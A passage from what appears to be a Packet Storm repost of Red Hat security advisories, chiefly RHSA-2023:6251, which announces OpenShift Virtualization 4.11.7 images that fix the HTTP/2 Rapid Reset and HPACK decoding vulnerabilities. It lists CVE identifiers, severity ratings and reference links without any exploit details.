All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6256-01

Red Hat Security Advisory 2023-6251-01 - Red Hat OpenShift Virtualization release 4.11.7 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6251.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Virtualization 4.11.7 Images security and bug fix update  
Advisory ID:        RHSA-2023:6251-01  
Product:            OpenShift Virtualization  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6251  
Issue date:         2023-11-01  
Revision:           01  
CVE Names:          CVE-2022-41723  
====================================================================

Summary: 

Red Hat OpenShift Virtualization release 4.11.7 is now available with updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.11.7 images.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding (CVE-2022-41723)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* 4.11.7 containers (BZ#2246329)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-41723

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Tag

#web